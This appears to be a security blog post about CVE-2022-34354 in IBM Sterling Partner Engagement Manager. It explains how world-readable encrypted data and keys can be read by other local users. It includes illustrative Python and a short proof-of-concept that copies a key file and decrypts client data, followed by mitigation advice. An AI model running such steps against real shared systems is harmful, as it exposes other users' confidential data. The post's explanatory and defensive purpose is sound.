Security vulnerabilities can be catastrophic, especially when data thought to be protected turns out to be exposed. One such case is CVE-2022-34354, a weakness found in IBM Sterling Partner Engagement Manager (PEM) 2., which could let unauthorized users on the same machine read encrypted client data stored locally. In this post, we'll break down what this flaw is, how it can be exploited, and what you should do about it.

What is IBM Sterling Partner Engagement Manager?

IBM Sterling Partner Engagement Manager is a software solution for managing business partner relationships, automating onboarding workflows, and securely exchanging data. It’s widely used in large organizations, particularly for supply chain and business-to-business (B2B) transactions.

Product: IBM Sterling Partner Engagement Manager 2.

- Issue: Encrypted storage of client data is saved to local storage in a way that allows other users on the same system to read it.

What’s the Risk?

The issue is that while client data is encrypted before being put on disk, it isn't isolated per user. Other users with local system access can potentially read this data and, if they can decrypt it (due to poor key management or local key storage), gain access to sensitive information.

>This is a classic example of insecure local storage of sensitive data.

How Does the Exposure Happen?

Imagine a multi-user system, like a shared Linux server. IBM PEM stores encrypted client data in a directory that's readable by all system users. If the encryption keys are also accessible, any user could read and decrypt another user’s confidential data.

Sample Code Snippet

The vulnerability can be conceptualized like this (not the actual PEM code, but a similar risk pattern):

import os
from cryptography.fernet import Fernet

# Write encrypted client data to a public location
def store_encrypted_data(client_data, key):
    fernet = Fernet(key)
    encrypted = fernet.encrypt(client_data.encode())
    with open('/tmp/pem_client_data.enc', 'wb') as file:
        file.write(encrypted)

# On a shared machine, any user can read this file:
def read_encrypted_data():
    with open('/tmp/pem_client_data.enc', 'rb') as file:
        return file.read()

If key is also stored or accessible in /tmp or another world-readable directory, any user can decrypt the data:

def get_key():
    with open('/tmp/pem_key.key', 'rb') as keyfile:
        return keyfile.read()

def decrypt_data(encrypted_data, key):
    fernet = Fernet(key)
    return fernet.decrypt(encrypted_data).decode()

So if /tmp/pem_client_data.enc and /tmp/pem_key.key are readable by any user, the data isn’t really protected.

To actually exploit this vulnerability, a malicious user on the same system would

1. Identify the storage location of encrypted data (e.g., /var/ibm/pem/data/ or a similar directory).
2. Gain access to the encryption keys (these might be stored in configuration files, environment variables, or another predictable location).

Below is a simplified, proof-of-concept (POC) scenario, assuming access to both the data and the key

# As user1, list the shared directory
ls -l /var/ibm/pem/data/client_data.enc
ls -l /var/ibm/pem/config/keys/client.key

# Switch to user2 (another user on the same server)
sudo su - user2

# Try reading the files
cat /var/ibm/pem/data/client_data.enc > /tmp/leaked_data.enc
cat /var/ibm/pem/config/keys/client.key > /tmp/leaked_client.key

# Use a small Python script to decrypt
python3
>>> from cryptography.fernet import Fernet
>>> key = open('/tmp/leaked_client.key', 'rb').read()
>>> f = Fernet(key)
>>> encrypted = open('/tmp/leaked_data.enc', 'rb').read()
>>> print(f.decrypt(encrypted).decode())
# Outputs the sensitive client data

Original References and Resources

- IBM Security Bulletin for CVE-2022-34354
- NVD (National Vulnerability Database) Entry for CVE-2022-34354
- IBM X-Force ID: 230424

How to Protect Your System

1. Update IBM Sterling PEM: IBM has addressed this issue in newer versions. Always apply the latest patches.
2. Check Permissions: Ensure client data files are not world-readable. Use chmod 600 (owner-only) or equivalent protections.
3. Separate Encryption Keys: Never store encryption keys together with the data. Use secure key vaults.
4. Audit File System: Regularly scan for world-writable or readable files in application directories.

Conclusion

CVE-2022-34354 is a sobering reminder that encryption alone isn't enough—storage security and access control are just as important. If you use IBM Sterling Partner Engagement Manager, make sure you review your system's file permissions and keep your software patched. Don’t let a weakness in local storage practices put your clients’ trust at risk.

Timeline

Published on: 11/16/2022 17:15:00 UTC
Last modified on: 11/18/2022 04:42:00 UTC